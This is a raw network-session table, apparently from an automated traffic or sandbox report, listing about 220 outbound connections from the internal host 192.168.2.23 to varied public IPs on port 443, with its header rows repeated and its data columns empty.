                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11028192.168.2.233974277.182.247.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11029192.168.2.2338288218.38.144.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11030192.168.2.234229623.38.84.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11031192.168.2.2342732218.6.100.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11032192.168.2.2343340178.45.145.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11033192.168.2.235871245.68.178.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11034192.168.2.23459622.96.150.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11035192.168.2.235627219.203.40.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11036192.168.2.234270297.185.79.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11037192.168.2.2334018181.146.86.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11038192.168.2.2335538103.179.26.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11039192.168.2.235388024.36.202.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11040192.168.2.2356052148.80.104.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11041192.168.2.2344326191.56.86.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11042192.168.2.235813275.22.171.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11043192.168.2.235571463.63.207.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11044192.168.2.2347354197.144.135.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11045192.168.2.2351662150.21.19.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11046192.168.2.2352370194.196.155.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11047192.168.2.235251040.48.17.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11048192.168.2.234392831.210.159.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11049192.168.2.236019252.180.51.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11050192.168.2.2359586111.74.195.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11051192.168.2.234856627.214.119.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11052192.168.2.235369284.252.212.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11053192.168.2.2338368150.169.148.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11054192.168.2.234067047.218.152.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11055192.168.2.23538584.196.243.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11056192.168.2.2356022173.12.58.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11057192.168.2.235242643.117.106.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11058192.168.2.233702897.204.169.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11059192.168.2.2360410220.210.32.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11060192.168.2.233980481.157.182.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11061192.168.2.2339354180.100.152.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11062192.168.2.235375625.196.106.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11063192.168.2.233404641.219.161.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11064192.168.2.2333982198.14.139.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11065192.168.2.2360706116.217.160.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11066192.168.2.2354860109.86.17.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11067192.168.2.234571272.5.117.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11068192.168.2.2333710111.114.235.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11069192.168.2.2359114184.86.203.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11070192.168.2.234363084.193.29.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11071192.168.2.2346696218.167.220.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11072192.168.2.2353518160.108.239.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11073192.168.2.2340588171.216.151.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11074192.168.2.2350490173.141.173.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11075192.168.2.2360650156.156.37.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11076192.168.2.2352224147.226.20.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11077192.168.2.235872666.225.150.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11078192.168.2.23486785.197.187.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11079192.168.2.2347778161.240.190.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11080192.168.2.235925038.27.252.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11081192.168.2.235827472.244.18.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11082192.168.2.234664413.120.93.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11083192.168.2.2349556201.217.130.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11084192.168.2.235714214.106.121.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11085192.168.2.2346184166.1.124.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11086192.168.2.233902046.235.216.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11087192.168.2.234365862.87.172.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11088192.168.2.236084090.133.96.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11089192.168.2.2355904167.75.34.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11090192.168.2.2336966189.82.214.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11091192.168.2.233704031.124.97.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11092192.168.2.2350084162.212.209.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11093192.168.2.2333984121.193.110.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11094192.168.2.23558302.189.223.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11095192.168.2.2343544128.164.11.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11096192.168.2.2345448131.177.153.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11097192.168.2.2347174138.14.137.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11098192.168.2.2358098170.207.170.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11099192.168.2.233973476.112.129.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11100192.168.2.2333772186.232.186.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11101192.168.2.2352644135.58.27.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11102192.168.2.233632637.252.70.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11103192.168.2.2343186122.186.112.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11104192.168.2.233776271.18.106.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11105192.168.2.2354106199.25.183.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11106192.168.2.2358196189.105.102.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11107192.168.2.2337938220.52.95.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11108192.168.2.2335816168.183.97.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11109192.168.2.235878214.62.83.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11110192.168.2.2343034111.218.109.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11111192.168.2.2342646184.189.231.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11112192.168.2.2339944144.26.46.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11113192.168.2.235272291.215.232.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11114192.168.2.2338312161.106.105.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11115192.168.2.2355160176.77.207.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11116192.168.2.2352118123.236.185.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11117192.168.2.2333736206.147.106.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11118192.168.2.2352202182.195.109.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11119192.168.2.233335072.70.174.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11120192.168.2.2333818207.23.17.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11121192.168.2.234335069.21.236.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11122192.168.2.233890838.168.231.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11123192.168.2.2334104125.177.85.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11124192.168.2.2347154176.21.128.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11125192.168.2.234823641.197.63.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11126192.168.2.2360156102.245.48.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11127192.168.2.23355689.219.232.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11128192.168.2.2341666120.195.24.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11129192.168.2.2339800190.122.243.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11130192.168.2.2347554209.44.92.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11131192.168.2.2336070113.229.174.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11132192.168.2.2353682109.168.206.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11133192.168.2.2352870101.107.171.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11134192.168.2.233611862.182.4.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11135192.168.2.2343104217.196.118.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11136192.168.2.234563248.30.193.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11137192.168.2.2340536133.48.64.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11138192.168.2.2352268111.116.113.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11139192.168.2.236021067.176.220.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11140192.168.2.234431480.69.29.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11141192.168.2.2359636124.71.206.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11142192.168.2.234544646.1.12.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11143192.168.2.2349832172.96.120.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11144192.168.2.2358522181.201.26.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11145192.168.2.234331051.120.240.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11146192.168.2.2344890130.99.136.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11147192.168.2.234518865.107.215.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11148192.168.2.23346788.188.226.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11149192.168.2.234097892.195.181.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11150192.168.2.233784093.70.240.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11151192.168.2.2348010216.222.70.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11152192.168.2.2334814184.117.132.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11153192.168.2.235879632.62.206.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11154192.168.2.2344586140.51.197.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11155192.168.2.233559218.10.126.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11156192.168.2.2342722101.35.113.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11157192.168.2.2337440148.209.224.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11158192.168.2.235613884.71.42.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11159192.168.2.2340552138.218.77.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11160192.168.2.235947085.247.175.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11161192.168.2.233325670.121.147.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11162192.168.2.234126459.196.40.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11163192.168.2.2346196206.207.148.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11164192.168.2.2357054212.183.141.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11165192.168.2.2353634159.38.179.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11166192.168.2.2337000126.125.207.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11167192.168.2.235220459.110.110.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11168192.168.2.2345778162.43.176.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11169192.168.2.2343590164.61.174.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11170192.168.2.234085095.201.162.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11171192.168.2.2357174189.127.36.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11172192.168.2.2349168143.181.127.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11173192.168.2.236029462.133.89.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11174192.168.2.2344634102.84.158.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11175192.168.2.234222650.215.233.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11176192.168.2.2351156173.170.88.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11177192.168.2.236046254.125.120.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11178192.168.2.235844864.190.112.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11179192.168.2.235558619.147.54.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11180192.168.2.234352878.1.169.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11181192.168.2.2339006210.134.17.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11182192.168.2.2352854201.113.26.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11183192.168.2.234038682.25.61.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11184192.168.2.235224469.95.154.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11185192.168.2.234903424.117.163.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11186192.168.2.235407823.5.252.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11187192.168.2.2338064220.121.125.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11188192.168.2.2354640211.81.104.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11189192.168.2.235812845.108.113.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11190192.168.2.2349318179.157.110.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11191192.168.2.2336996176.205.66.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11192192.168.2.235103824.163.14.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11193192.168.2.235241264.32.196.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11194192.168.2.2349634219.8.57.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11195192.168.2.233795073.220.33.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11196192.168.2.2337480141.119.176.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11197192.168.2.2334114222.119.61.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11198192.168.2.233297286.196.124.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11199192.168.2.234699853.188.189.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11200192.168.2.233858693.114.193.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11201192.168.2.2344054178.42.106.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11202192.168.2.2352598115.114.127.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11203192.168.2.233973864.69.227.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11204192.168.2.2335842138.164.115.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11205192.168.2.2357774160.235.154.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11206192.168.2.235728494.221.0.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11207192.168.2.2338282135.136.6.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11208192.168.2.233886834.156.209.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11209192.168.2.233669072.132.201.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11210192.168.2.233957851.204.222.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11211192.168.2.2352662211.33.51.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11212192.168.2.2359834221.91.238.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11213192.168.2.235999241.11.76.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11214192.168.2.234901839.146.72.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11215192.168.2.233860277.82.50.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11216192.168.2.233403074.43.181.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11217192.168.2.2358922206.197.236.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11218192.168.2.235582448.18.11.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11219192.168.2.234638891.16.140.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11220192.168.2.235816072.217.76.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11221192.168.2.2356814189.108.225.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11222192.168.2.23533802.77.128.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11223192.168.2.2333748132.0.160.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11224192.168.2.2334368173.89.178.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11225192.168.2.234995889.140.117.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11226192.168.2.2344398111.164.11.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11227192.168.2.235387413.59.245.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11228192.168.2.233860059.55.154.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11229192.168.2.233764479.237.141.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11230192.168.2.234521270.230.205.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11231192.168.2.2353988167.193.16.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11232192.168.2.235273881.7.197.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11233192.168.2.234133052.87.92.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11234192.168.2.2336172161.143.82.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11235192.168.2.2357360167.69.12.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11236192.168.2.2343078128.165.180.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11237192.168.2.233719874.154.192.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11238192.168.2.234229078.60.179.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11239192.168.2.23475128.136.236.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11240192.168.2.2353784117.177.100.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11241192.168.2.2333262189.131.248.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11242192.168.2.235449675.153.212.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11243192.168.2.2333654184.221.219.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11244192.168.2.2338898164.207.3.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11245192.168.2.235745239.243.106.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11246192.168.2.234863864.46.119.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11247192.168.2.234561893.179.20.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11248192.168.2.234334414.103.176.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11249192.168.2.2347448128.74.2.148443
